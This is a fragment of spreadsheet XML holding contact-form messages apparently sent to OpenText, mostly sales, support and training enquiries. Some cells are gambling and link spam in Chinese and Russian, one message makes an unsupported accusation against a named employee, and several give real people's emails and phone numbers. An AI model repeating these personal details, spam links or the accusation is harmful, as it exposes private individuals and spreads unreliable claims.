1.  Is there a foreseeable date for course at UK site._x000D_
2.  Cost of running course at customer site_x000D_
_x000D_
3-3730 OpenText Communications Center Enterprise Installation and System Administration v16</t>
  </si>
  <si>
    <t>Bonjour_x000D_
_x000D_
J’ai vu la présentation de la solution d’intégration de l’informions « OpenText  Integration Center » sa ma plus. J’aimerais avoir plus d’information concernant la présentation des modules contenus dans le progiciel ainsi que le coût enfin de faire une proposition à mon Entreprise_x000D_
_x000D_
Salutations Distinguées</t>
  </si>
  <si>
    <t>To seva contact</t>
  </si>
  <si>
    <t>I want my contact to seven his self</t>
  </si>
  <si>
    <t>Nous sommes revendeur informatique. Un de nos client cherche à renouveler son serveur fax. Pouvez-vous m'envoyer un questionnaire que j'enverrai à mon client pour qualifier au mieux son besoin puis pouvoir lui faire ensuite une proposition de solution_x000D_
Merci</t>
  </si>
  <si>
    <t>Access to Knowledgebase for SNL08105970</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a renewal quote for our HP eDoc support. The below products are used in our environment. _x000D_
_x000D_
20 DM Client licenses and 1 DM server license_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>★免打流水 祝测即宋18-88圆 每周APP再宋88白菜 ~!! _x000D_
专属客服QQ:340659818 _x000D_
专属链接:www.zb760.com _x000D_
APP每周签到宋476免费菜金~！！ _x000D_
首寸100%+次次寸宋醉高25%+每日寸宋40% _x000D_
下APP随时掏机即玩！宋8-88菜金~！ _x000D_
【八大劳虎鸡、真人视讯、捕鱼、体育】多种玩法~！</t>
  </si>
  <si>
    <t>Need to remove my resume from system. I had applied for SAP FICO role and need to remove Resume name Asif1 from your database and keep the other with AsifJadoon-CR for further process</t>
  </si>
  <si>
    <t>I have my ave.TAT in dd:hh:mm:ss  (14 21:15) format, how do I round this up to DD only</t>
  </si>
  <si>
    <t>We are currently trying to determine a budget for 2018 for purchasing and implementing Record Management software and would be interested in obtaining a recommended dollar amount needed for OpenText software._x000D_
_x000D_
This is only for planning so we can try and determine how much to set aside in 2018 as an average cost. I can only provide minimal details at this time._x000D_
_x000D_
We were looking at the OpenText eDocs, servers stored on site, with a maximum of about 75 users using it. We would require OCR functionality, e-mail integration, some automated workflows (i.e. at end of month run report), and group classifications (i.e. Assigned a classification number with a set retention schedule, anything under that classification system follows that retention schedule)._x000D_
_x000D_
If you could provide information about which additional modules would be required, and based upon previous implementations an average dollar amount so we can get this planned out, it would be of enormous help. Please let me know if you have any questions._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>B2B Managed Services</t>
  </si>
  <si>
    <t>I've waited all afternoon (after two link requests) and I have not received the download link for the DWG viewer. Thank you!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for a good fax and technical partner. Can we schedule a time to talk about the RightFax solution?_x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Vill gärna ha en kontakt för att återuppta en gamal dialog kring att använda Brava! Reader som generell viewer inne i Teamcenter._x000D_
BR Henrik</t>
  </si>
  <si>
    <t>I'm looking for document recognition tool that can be offered to our customer as part of the solution.</t>
  </si>
  <si>
    <t>[url=http://healthfree.us/]http://healthfree.us/[/url] Wakcably</t>
  </si>
  <si>
    <t>A Transnordestina Logística está em busca de um novo parceiro no âmbito de gestão eletrônica de documentos, a fim de integrar processos de diversos setores da companhia._x000D_
_x000D_
A demanda é bastante sensível e com isto buscamos conhecer fornecedores que possam se tornar parceiros. Com isto, solicito que encaminhe seu portfólio de apresentação com foco em GED para que possamos apreciar as funcionalidades da sua solução.</t>
  </si>
  <si>
    <t>Would like a demo on your call and screen recording solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to speak to someone regarding options for fax-to-email &amp; Office 365. </t>
  </si>
  <si>
    <t>Need access to Trading Grid Online Tradinggrid.gxs.com/TigerLogin</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam/Sir,_x000D_
This message is addressed to the Netherlands branch and the person responsible for sales to European institutions_x000D_
As you may know, the EEAS (European External Action Service) tender that will replace our MARS project has been announced. We shall bid with eDocs. There is a long list of technical requirements, to which we may need some guidance and we'll certainly need a quotation. Please provide us with a contact a) for technical matters and b) for the quotation. _x000D_
Thank you in advance for a quick feedback. _x000D_
Best regards, _x000D_
Leonidas Bardis _x000D_
EUROPEAN DYNAMICS_x000D_
</t>
  </si>
  <si>
    <t>Have requirement for RMS and Analytics platform for Law Enforcement vertical. I am considering Opentext for RMS  but the more I read it appears that it could also be the analytics platform. Can someone please contact me to discuss the technical aspects of the product and a potential reseller relationship?</t>
  </si>
  <si>
    <t>My name is Brandi Richardson with Cisive. We are a professional fact finding organization, which represents a number of major corporations. One of our clients has requested to verify employment for a former/current employee with your company. What is your process for employment verifications or is there a Payroll or HR department I can contact? Please respond with as much information as possible and reference 11262003-22.</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
Im interested in EMC Captiva Cloud Toolkit to scan with my web-browser application. In EMC told me that I need to contact you to get a quote and more information. Please let me know if you need something else. Thanks!_x000D_
_x000D_
Marco</t>
  </si>
  <si>
    <t>Привет всем участникам! _x000D_
Нашёл интересные новости: _x000D_
http://energysmi.ru/news/28868-poroshenko-istoriya-s-futbolistom-zozuley-rezultat-propagandistskoy-kampanii.html [b] Порошенко: История с футболистом Зозулей – результат пропагандистской кампании [/b] _x000D_
[url=http://energysmi.ru/news/5196-v-preddverii-pozharoopasnogo-perioda-rostovenergo-provedet-svyshe-50-sovmestnyh-trenirovok-s-mchs.html] В преддверии пожароопасного периода Ростовэнерго проведет свыше 50 совместных тренировок с МЧС [/url] _x000D_
http://energysmi.ru/news/27078-mnogoglazyy-argus-kak-vskryt-tanki-vraga-i-otbitsya-ot-lazernoy-ataki.html _x000D_
http://energysmi.ru/news/4551-na-zapadnoy-kurne-28243-na-1-m-etape-budet-dobyvatsya-okolo-10-mln-t-nefti-v-god.html _x000D_
Новости политики Донбасс ЛНР ДНР http://energysmi.ru/</t>
  </si>
  <si>
    <t>Ребята, кто-нибудь знает хорошие партнёрские программы, чтобы выжать из сайта максимум дохода? _x000D_
[url=http://partner-progs.ru/progs.png][img]http://partner-progs.ru/progs.png[/img][/url]</t>
  </si>
  <si>
    <t>We currently have a right fax express and a fax press device. I would like to consolidate the two devices and the lines they take in. Either via software solution or on one of our computers or a fax appliance. The right fax express is at our Port Orange office and the older fax press is at the new Smyrna beach office. So we would need something to handle all lines. Thanks</t>
  </si>
  <si>
    <t>I am trying to open a case for Connectivity Secure Server and the support page keeps looping me around. Does ADP have any support for this product? We have had it in production for 5+ years and I am now in need of some help with it</t>
  </si>
  <si>
    <t>Would like to talk about technical requirements of right fax, and a demo.</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Нашёл интересное в сети: http://electek.ru/news/24039-maydan-v-rossii-budut-provodit-po-kalke-s-ukrainy-pervaya-repeticiya.html [b] Майдан в России будут проводить по кальке с украины. Первая репетиция! [/b] _x000D_
[url=http://electek.ru/news/8078-slovackaya-obschina-ukrainy-protestuet-protiv-mobilizacii.html] Словацкая община Украины протестует против мобилизации [/url] _x000D_
http://electek.ru/news/4946-mrsk-severo-zapada-razrabatyvaet-10-letnyuyu-programmu-zakupki-i-vyvoda-iz-ekspluatacii-spectehniki-i-avtotransporta.html _x000D_
http://electek.ru/news/4889-dolg-ukrainy-za-gaz-pered-rf-sostavlyaet-162-mlrd.html _x000D_
[url="http://electek.ru/"]http://electek.ru/[/url]</t>
  </si>
  <si>
    <t>Bonjour, J'aurai avoir plus d'informations sur la solution SAP Chorus pack (Délai de mise en oeuvre, couts setup, run,...) selon option_x000D_
Cordialement</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am the paralegal for JetSmarter Inc and I would like some information regarding integrating OpenText with our company.  I would like to know pricing and also set up a demo of the platform. Can you please contact me via the email provided to get the process started._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Lawrence Mattier</t>
  </si>
  <si>
    <t>I am having trouble logging into Easylink my user ID is 9848</t>
  </si>
  <si>
    <t xml:space="preserve">4)	Greetings.  I am the new project manager for Novant Health, assigned to the implementation of the RightFax Inbound Implementation Project.  The former project manager’s name was Danielle Drummond.  This project was in the pilot phase in February, but was put on hold due to performance issues during the pilot phase that impeded rollout to clinics._x000D_
_x000D_
Novant Health would like to resume the project and resolve any performance issues that were impeding the project from moving past the pilot stage._x000D_
_x000D_
The account representative from our project records is Kaarin Ginosatis.  _x000D_
_x000D_
Novant Health is using the Rightfax Outgoing produce.  Rightfax has licensed the Inboud product but is not in production due to performance issues that were experienced in the Pilot in January/February.  Jody Lambert, Novant Health, was working with someone from your organization before the project was put on hold.  _x000D_
_x000D_
Novant Health would like to resume the project, but we do not have a vendor account contact with Open Text.  Please let me know who the vendor account representative, and his or her contact information._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Maureen Thomas, PMP_x000D_
Novant Health_x000D_
704.316.8281_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are considering products for a document management software tool and I'm interested in demo of Documentum. </t>
  </si>
  <si>
    <t>Who is the Sales rep for Chemours?  I need to contact them regarding TeamSite Software</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are 4 person interesting at this course 3-0177 What's New in OpenText Content Server v16.2 in October 2017_x000D_
Do you have government Rate? or discount</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting Access to OT._x000D_
Access: I need full access. _x000D_
Product Line: ECM_x000D_
Co-Worker: Jonathan Ruffin_x000D_
Company: PJM_x000D_
_x000D_
Please let me know if you need additional information to process my request. Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Primarily interested in enterprise scale SMS functionality, particularly, bi-directional chat.  OpenText are identified by Gartner as a leader in Customer Communications Management Software and we are keen to discuss. </t>
  </si>
  <si>
    <t xml:space="preserve">dear team._x000D_
we are your partner. and we have customer (Order 8000004694 / PO F14946/17OPEN/KFIU) who has a valid lic. i am not able to access the downlaod site or open tkt on his behave can you grant me access please._x000D_
fadi_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently looking for a education/course for opentext 3-2010 Document Archiving for SAP Solutions and must ask if the education in either Stockholm or Helsinki starting 27th of November is expected to be completed?_x000D_
_x000D_
yours sincerely Hans </t>
  </si>
  <si>
    <t>_x000D_
We are a logistics office and would like to offer to our clients as a service the digital archiving, ERM: (Electronic records management), (we will  archive the documents and give to the client an access online), thanks to  send us  your best price offer._x000D_
Please give us the details of the payment method and the technical data sheet of the software. Respectfully.</t>
  </si>
  <si>
    <t>Looking for fax appliance (E-fax) to work with existing analog lines ( 4 Lines)_x000D_
Looking forward to hearing from you.</t>
  </si>
  <si>
    <t>I need to renew my Brava! Desktop Licence as its not allowing me to access the program on my PC. I am not sure how I go about doing this. I would appreciate some instructions on how to go about this. Many Thanks, Shaun Tavener.</t>
  </si>
  <si>
    <t xml:space="preserve">pricing </t>
  </si>
  <si>
    <t>Enquiry of license and pricing</t>
  </si>
  <si>
    <t>Hello, we are currently looking for Document Management Solution. If possible, we hope you could get your official representative to get in touch with me as soon as possible.</t>
  </si>
  <si>
    <t>[url=http://kiev-design.com/articles-partners24/mebel-dlya-kafe-v-moskve-otrazhenie-stilya-vashego-zavedeniya.html][img]https://s8.hostingkartinok.com/uploads/images/2017/09/33ddffa868b6aeac305d6d1e7558f3d4.jpg[/img][/url] _x000D_
 _x000D_
 _x000D_
 _x000D_
Тогда можно не нем можно будет, не рискуя защемить, а то и сломать палец цепью, раскачаться, аж дух захватывает Приобретите для дома или дачи полукруглую мебель из ротанга, которая своими плавными линиями напоминает лепестки экзотического цветка  [url=http://www.stroy.rusopt.ru/publicinfo/mebel-dlya-doma-i-dachi/originalnyi-sovremennyi-trend.html]Оригинальный современный тренд в интерьере.[/url] ну и не без плетеная мебель дешево</t>
  </si>
  <si>
    <t>Shelly Berryman is on Facebook representing your company. She is targeting and calling middle eastern people white supremacists. I dont care what you do with her but you should know you have a racist anti american Antifa terrorist on your payroll. https://www.facebook.com/shelley.berryman.1?fref=ufi&amp;rc=p</t>
  </si>
  <si>
    <t>unable to reset password - this is 1st time I signed in since Open Text, I would like to open support ticket but am unable to because I cannot sign in.  I will be in office tomorrow at 7:30 am CT</t>
  </si>
  <si>
    <t>how to started</t>
  </si>
  <si>
    <t>Hi, I've tried to install your free product "BIRT iHub F-Type" on Linux without success (as I'm on a distribution that is not supported). Now when I try to download the VMWare image from http://www.actuate.com/resources/landingpages/?articleid=33100 the link is not working as I'm landing on a page to download a trial version of iHub commercial edition._x000D_
_x000D_
Aren't you providing the free version with limited output of 50 MB anymore?</t>
  </si>
  <si>
    <t>To register as sub contractors please</t>
  </si>
  <si>
    <t>[url=http://vash-remontik.ru/sadovaya-mebel-iz-tika-traditsii-blagorodstva/][img]https://s8.hostingkartinok.com/uploads/images/2017/09/5391f536f65b7595bfccd507f81dc601.jpg[/img][/url] _x000D_
 _x000D_
 _x000D_
 _x000D_
Также отличным вариантом для стиля хай-тек будет кресло из металлических прутьев Похожие бесплатные объявления на сайте  [url=http://k-systems.ru/mebel-iz-iskusstvennogo-rotanga-koncepciya-uyuta/]Мебель из искусственного ротанга – концепция уюта[/url] ну и как всегда павильон садовый olivet</t>
  </si>
  <si>
    <t>Request a demo for Enterprise Content Management (ECM)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello we are interested in becoming your supplier for all of your maintenance and construction needs across Canada and globally, can you please tell me the process for this and also can you tell me the person to contact including their name, email address, and phone number, thank you very much, have a wonderful day!_x000D_
</t>
  </si>
  <si>
    <t>Massge</t>
  </si>
  <si>
    <t>Need to change payment plan put in a new card</t>
  </si>
  <si>
    <t xml:space="preserve">we have a License through Hammmern Consulting (HAMCON) Sigve Skjeldal,_x000D_
Prod.Media Code2548B020-9274FE06-C3A3E640-EAEEBC06_x000D_
I am the Developer and should very much like to  know how to link me/my e.mail to My Support._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Enterprise Limited is a Enterprise technology , consulting and outsourcing company .We provide enterprise solutions for companies in Nigeria. We also implement SAP ERP for clients and we have done this in the last 10 years for several companies. We will like to know what it takes to partner with your organisation  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sir/Ma'am,_x000D_
Greetings,_x000D_
_x000D_
I am genuinely interested to apply in your company for cashier position._x000D_
I am Eunice Joy Garcia, an innovative and well experienced person with an accomplishments as a Sales Executive position for more than 5years. I am a quick learner, flexible and have an ability work under pressure. I'm also looking forward to join a progressive organization, which would effectively utilize my knowledge in visual, sales and marketing and analyze my skills at fostering strong teamwork and encouraging a healthy and communicative work environment. _x000D_
_x000D_
I would appreciate the opportunity to discuss my qualifications and look forward to meet with you in the near future to learn more about your firm, it's plans, goals and make a great contributions and be a big part of its continues success._x000D_
_x000D_
To further to acquaint you to my background, I am enclosing my updated Curriculum Vitae. I hope you consider me as one of the top candidate._x000D_
_x000D_
You can contact me at the time of your convenience through my email (garcia14.eunicejoy@gmail.com) or call (+971 525797802)._x000D_
_x000D_
Thank you so much and more power._x000D_
Have a good day and Godbless._x000D_
_x000D_
Best Regards, _x000D_
Eunice Joy_x000D_
</t>
  </si>
  <si>
    <t>Reaching out from Live Nation and looking to discuss your upcoming event.</t>
  </si>
  <si>
    <t>I would like to take 5-0153 OpenText Content Server Developer Certification Program - OTCSSD. There is no date for this course. Could you set up one training course? Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Препараты для АРВ терапии (лечения ВИЧ инфекции)  _x000D_
 _x000D_
[url=http://india-med.net]sovihep отзывы[/url]_x000D_
 _x000D_
&lt;a href=http://india-med.net&gt;гепцинат натко&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>We are looking for an enterprise reporting solution.  We currently use MS SQL Server Reporting Solution for our reporting needs but are looking for something more features, web-based, user self-discovery, scheduling, and customizable.</t>
  </si>
  <si>
    <t>Hello, Do you have a contact email for you office in Cork, Ireland?</t>
  </si>
  <si>
    <t>Discuss usage of the Open Text Extended ECM product we purchased for usage here at Elbit Systems of America.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to know if the following courses are available:  GCDocs - Web Reports I 3 2 AND _x000D_
GCDocs - Web Reports II and get their detailed information_x000D_
</t>
  </si>
  <si>
    <t>I need to subscribe to email notifications for Customer Alerts as described at https://knowledge.opentext.com/knowledge/cs.dll?func=ll&amp;objId=38507915&amp;objAction=ViewNews but can't figure out how.</t>
  </si>
  <si>
    <t>I am not sure if IXOS software is part LiveLink and Open Text. _x000D_
We are a hotel company and need a document management solution that integrated between Procurement and Accounting Systems. Some properties utilized IXOS with SAP, but we are using SunSystems by Infor. Not sure if product would work with any accounting systems or just SAP. If someone could give me a call respond by email that would be great. _x000D_
Thank you,_x000D_
Tokhir</t>
  </si>
  <si>
    <t>Hello._x000D_
_x000D_
1. Is Streamserve 5.6 compatible with SQL Server 2016 SP1 Enterprise Edition x64 ?_x000D_
2. If it is not,  what is the latest version of SQL Server that we can upgrade it to instead ?_x000D_
3. If not 2016 compatible,  is there a later version of Streamserve that will work on SQL Server 2016 SP1 Enterprise Edition x64 ?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Adrian Ffrench.</t>
  </si>
  <si>
    <t>hello, i need to know if a customer has to pay a license  for OpenText Data Archiving for SAP® Solutions. In positive case, may you say me the license name? i don't find this information in this site._x000D_
Regards._x000D_
bye,_x000D_
Maurizio</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
I hope you are doing great!_x000D_
_x000D_
Would you be interested in reaching out to Content Management Software Users?_x000D_
_x000D_
We have an exclusive database of Content Management Software email contacts. Would this be of interest to you?_x000D_
_x000D_
Below are the few Content Management Software Users list:_x000D_
_x000D_
•	Adobe CMS users_x000D_
•	AgilityCMS users              _x000D_
•	AirWatch CMS users       _x000D_
•	Alfresco CMS users         _x000D_
•	Ektron CMS users_x000D_
•	Hyland  CMS users_x000D_
•	Hyperwave CMS user and many more..._x000D_
Would you be targeting a different target audience, please suggest a convenient time for a quick call._x000D_
_x000D_
Database Info:_x000D_
1) Complete information fields for contacts like contact name, email id, phone, fax, industry, company name, company address, etc. (25 information fields)_x000D_
2) All email addresses are 100% opt-in to receive the third party offers. _x000D_
3) 95 % guarantee on accuracy._x000D_
4) List Coverage: NA, EMEA, APAC, Middle East, Africa._x000D_
_x000D_
Appreciate for your time and I definitely will look forward for an opportunity to work with you._x000D_
_x000D_
Regards,_x000D_
Samantha K._x000D_
Demand Generation| Data Analytics _x000D_
USA| UK |Europe |APAC_x000D_
To remove from this mailing: reply with subject line as "leave out_x000D_
Note: please forward to the responsible contact._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am a new administrator and what to know how to create a new client file in the DM</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Après avoir parcouru les fonctionnalités de OpenText, nous sommes très intéressés par les fonctionnalités de votre suite logiciel et je souhaiterais échanger avec l'un de vos commercial, et avoir une démonstration de OpenText pour Salesforce._x000D_
_x000D_
Bien à vous,_x000D_
_x000D_
Pierre BESSES</t>
  </si>
  <si>
    <t>We would like to trial the Brava Desktop product however we are getting 'not licensed' errors when testing.  Please contact me @ mhandley@fleet.ca</t>
  </si>
  <si>
    <t>We have received Invoice 9000160116 Dated 9/18/2017 and do not know who your CTL contact is.  Could you please reach back out to me and let me know who your contact within CenturyLink is so I can get with them to get this invoice approved and paid?_x000D_
Thank you._x000D_
Amy Prine</t>
  </si>
  <si>
    <t>Partnership request and a demo</t>
  </si>
  <si>
    <t>Understand Features and functionality about Opentext capability to query from multiple databases.</t>
  </si>
  <si>
    <t>support renewal - no response from SA office</t>
  </si>
  <si>
    <t>Newsletter</t>
  </si>
  <si>
    <t>find out out about enterprise web CMS</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
    We are a System integration company in Hong Kong, providing software development services to corporates. What are the requirements to register as opentext partner? Where we can obtain study materials?_x000D_
Thanks</t>
  </si>
  <si>
    <t>I have no access to "My Support" for Captiva Capture. Please give me access!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We would like to know if Content Server application is supported in Azure cloud platform? We are looking for this information for our client, as we are migrating their servers from on-premise to Azure cloud. _x000D_
 _x000D_
Any information is greatly appreciated._x000D_
_x000D_
Thank you in advance._x000D_
</t>
  </si>
  <si>
    <t>is TempoBox have on premise server?</t>
  </si>
  <si>
    <t>Budgeting questions and demo.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated database of Health IT professionals industry._x000D_
_x000D_
We have complete contact details of Various key decision makers such as CIO's, CTO's, CNO's, CNIO's, CMO's, CMIO's, Clinical Engineering Professionals, Clinical Informatics, Healthcare Financial Professionals, IT Professionals, Doctors, Nurses, Pharmacy Professional, Physician, Public Health Practitioner, Public Health Practitioner, Dentist (All Specialty) and Medical Consultants._x000D_
_x000D_
Industries List: Hospitals, Drug Stores, Pharmaceutical, Manufacturers, Otolaryngologists, Medical Devices &amp; Equipment's, Clinical Trial &amp; Clinical Research, Retail &amp; Distribution and many more._x000D_
_x000D_
Kindly mention below the details to understand your needs better so that we can provide you exact counts, cost and few samples._x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Best Regards,_x000D_
Alice Miller_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>We're seeking a DAM Platform as a Global Enterprise solution.</t>
  </si>
  <si>
    <t>Looking to make a quote for a current customer. Who would I talk to about that?</t>
  </si>
  <si>
    <t>I'm wondering about pricing, and if there are any deals for brava desktop TX?</t>
  </si>
  <si>
    <t>Interested in pricing and info on Brava viewer for IBM TRIRIGA Capital Projects</t>
  </si>
  <si>
    <t xml:space="preserve">Are you going to Dreamforce?  We would like to arrange a best time to meet up._x000D_
_x000D_
MarketSource is a division of Allegis Group the world’s largest privately held human capital firm with over $13B in annual revenue._x000D_
_x000D_
In addition to having 300,000 employees in 400+ offices, we are the “3RD Biggest User of Salesforce” on the planet._x000D_
_x000D_
Gaining new customers, growing market share and launching new products is our specialty._x000D_
_x000D_
Simply put we can help you achieve much BETTER SALES in 2018!_x000D_
_x000D_
Please let us know who will be there._x000D_
_x000D_
Thanks,_x000D_
Jason_x000D_
</t>
  </si>
  <si>
    <t>can OpenText ECM be integrated with any ERP System(Workday, tyler etc) or only SAP, Oracle, Microsoft?</t>
  </si>
  <si>
    <t>As an administrator of this account, I don't have the ability to remove a user and add users to the account.  Please remove Pamela Shim, she is no longer with the city.  _x000D_
_x000D_
Please add the following to the account in order to create Technical Support tickets:_x000D_
_x000D_
Kirk Miller, Lead Info Tech Systems Spec, kirk.miller@phoenix.gov_x000D_
Sam Rios, Lead Info Tech Systems Spec, sam.rios@phoenix.gov_x000D_
Richard Petragallo, Senior Info Tech Systems Spec, richard.petragallo@phoenix.gov_x000D_
Annette Maynard, Senior IT Systems Specialist, annette.maynard@phoenix.gov_x000D_
Galen Schliem, Senior IT Systems Specialist, galen.schliem@phoenix.gov_x000D_
_x000D_
Thank you,_x000D_
Kristina Raymond</t>
  </si>
  <si>
    <t>Looking for options to have a demo and discuss on buying your ECM product.</t>
  </si>
  <si>
    <t>We have purchased a license for Gupta Team Developer. One of our installation specialists is trying to install it for the user on an offline machine, but was unable to manually activate the software - he was told that he needed to be a technical contact. _x000D_
Who is currently authorized to activate the software? _x000D_
_x000D_
We will need to work out a process on our end so that an authorized contact is the one to request activation, but we need to understand who that is in order to do so._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Evening guys, please can I setup some time to meet and discuss your offering?</t>
  </si>
  <si>
    <t>Interested in how Rightfax can integrate into our Ricoh MFP's with a SIP trunk or Etherfax.  We utilize MFP for all fax and want to create a solution where the MFP talks to the server for outbound to a SIP provider here in Canada as well have incoming faxes be transmitted and printed directly on MFP across Canada and the US</t>
  </si>
  <si>
    <t>We are interested in physical document management systems.</t>
  </si>
  <si>
    <t>It's possible to active my account to see support to produtcts like WEM, Portal, Vignette Content? I'm actualy as developer in VILT Group in Brazil and I'm a new employee here and I'm learning more about WEM and Portal everyday.</t>
  </si>
  <si>
    <t>My name is Joey from Captive Eight and we host evening functions around the country. We guarantee you and your team 10-12 private 1 on 1 meetings with high level enterprise IT executives who have real budgets and initiatives based on specific qualifications we can discuss further. Is there a marketing or events marketing person you can direct me to?</t>
  </si>
  <si>
    <t>ATOS North America Operations is proposing a CPU change for our client SEMPRA, they are currently running their workload on a CPU 2965-S05 s/n DBB97 rated at 2843MIPS / 352 MSU located in San Diego, CA._x000D_
Our plan is to move their workload to a Hard Capped LPAR in our HUB Machine that will be located in the datacenter at Irving._x000D_
Please provide the following information:_x000D_
•             What is the current License and Annual Maintenance price for the products on the 2965-S05?_x000D_
•             What is the proposed License and Annual Maintenance price for the products on a Hard Capped LPAR of 4800 MIPS / 594MSU on a CPU 2964-609 (7812 MIPS / 968 MSU)?_x000D_
•             What is the proposed License and Annual Maintenance price for the products on a Hard Capped LPAR of 6400 MIPS / 792MSU on a CPU 2964-609 (7812 MIPS / 968 MSU)?_x000D_
•             Is there an upgrade or other fee for the move of these products to the target machine?_x000D_
_x000D_
Additionally, The Client is particularly interested in how much of the charges could be capitalized so, could you please provide a unique up-front payment quote (for both 4800 MIPS an 6400 MIPS options) including the license and the following 5 years of maintenance in order to reduce the steady state run costs._x000D_
Product: Exstream Dialogue</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a document management solution.  Can someone contact me as soon as possible. We have a solution that we are looking at and it's not a perfect system.  I need to know what else is out there to consider. </t>
  </si>
  <si>
    <t>Hey OT Team,_x000D_
_x000D_
I hope you have having a lovely little Thursday!  I am having issue setting up my Skytap account... I keep just requesting access the the knowledge center.  Let me know the best way to go about requesting access as I am sure it is some user error that I just keep repeating._x000D_
_x000D_
Thanks,_x000D_
Stephan_x000D_
_x000D_
PS - this is the link I was given - https://knowledge.opentext.com/knowledge/cs.dll/fetch/2001/17767705/17967656/cs.dll?func=ll&amp;objId=45507042&amp;objAction=browse&amp;viewType=1</t>
  </si>
  <si>
    <t>Hello, my team and I are looking for a solution to extract data from typed PDF forms (including checkboxes) and were shown a demo of Captiva from another department at our company. We are now interested in testing a trial version of Captiva but are not sure where to download one, would you be able to help? Thank you!</t>
  </si>
  <si>
    <t>I was preparing to mail a check for Easylink Services, Corp,payment of invoice #07378421709 and noticed that the remit address was different than what was in our vendor file. When this occurs, I've been instructed to make contact with someone in the company to confirm where we should be mailing the checks. The phone numbers we have in the vendor file are no longer in service. Using the website, I found another number and left a voice message. The invoice has a due date of 9/30/17 so I would like to get this in the mail ASAP.  _x000D_
Thank you,_x000D_
Gina Wynne</t>
  </si>
  <si>
    <t xml:space="preserve">I just was wondering if there is a personal version of teamsite.  What I want to do is test TeamSite on AMAZON AWS EC2 using Ubuntu.  Please let me know via email </t>
  </si>
  <si>
    <t xml:space="preserve">Change of postal address / Reka Kaapeli Oy_x000D_
_x000D_
Please change our postal address in your files to read:_x000D_
Reka Kaapeli Oy_x000D_
Kaapelikatu 2_x000D_
05800 Hyvinkää_x000D_
_x000D_
Postbox address PL 12 is nomore in use of Reka Kaapeli Oy._x000D_
_x000D_
Our invoicing address is:_x000D_
Reka Kaapeli Oy_x000D_
Salokunnantie 590_x000D_
35550 Salokunta_x000D_
or_x000D_
invoices@reka.fi_x000D_
or_x000D_
OVT-tunnus: 003711108463_x000D_
Operaattori: OpusCapita Group Oy_x000D_
Välittäjän tunnus: 003710948874_x000D_
_x000D_
Kind regards_x000D_
Marja-Leena Sailio_x000D_
Reka Kaapeli Oy_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have an older fax press and need to look into upgrading. </t>
  </si>
  <si>
    <t>Equipe OpenText bonjour,_x000D_
_x000D_
Notre client MHIS a reçu un avis de renouvellement pour le contract 0015002302 et 0015002581._x000D_
_x000D_
Malheureusement, notre client ne sait pas vraiment à quoi correspond cette facture/prestation_x000D_
_x000D_
Pourriez donc s'il vous plait nous fournir le détail des prestations choisis pour notre client MHIS._x000D_
_x000D_
en effet, les termes suivants ne nous évoque rien : _x000D_
"Document Management Full Named Users" pour le contrat 0015002581_x000D_
"Document Access for SAP Solutions Full Named Users" pour le contrat 0015002302._x000D_
_x000D_
Merci d'avance,_x000D_
_x000D_
_x000D_
============_x000D_
Hello OText Team,_x000D_
_x000D_
our customer receive support extending (SFR08121557 and SFR08121558)_x000D_
but, he seems don't know what is for,_x000D_
_x000D_
so, for Contract 0015002581(SFR08121558)_x000D_
and for contract 0015002302 (SFR08121557)_x000D_
_x000D_
could you please give us details of prestation for MHIS customer,_x000D_
_x000D_
in fact,_x000D_
your product detail on the invoice seems not understandable for my customer,_x000D_
he don't know what is "Document Management Full Named Users" for contract 0015002581_x000D_
_x000D_
and what is "Document Access for SAP Solutions Full Named Users" for contract 0015002302._x000D_
_x000D_
_x000D_
thanks in advance,</t>
  </si>
  <si>
    <t>Job Reference #16160_x000D_
Hello, I am currently applying for the role as Technical Analyst in Cork, Ireland. However, there is no contact information for recruitment/hiring on your advertisement (Job Reference #16160). I would like to enquire if it is possible to get this information, in order to address my cover letter &amp; CV. Many thanks._x000D_
_x000D_
Kindest Regards,_x000D_
Triona McCarthy</t>
  </si>
  <si>
    <t>how do I download a file I have received from opentext to my computer?</t>
  </si>
  <si>
    <t>Dear,_x000D_
We are integrated business services provider who continuously looking for optymalization for our customers (our goal is to connect standard services with a  IT/Software solution). _x000D_
One of our base service is digitalisation of data and archives. Therefore, we are looking now for more complex software which will helps to service our customers. _x000D_
_x000D_
We would like to, have possibility to offer in our inteligent scanner rent price/flat rate/  software which will able to manage archives and digit documentation. _x000D_
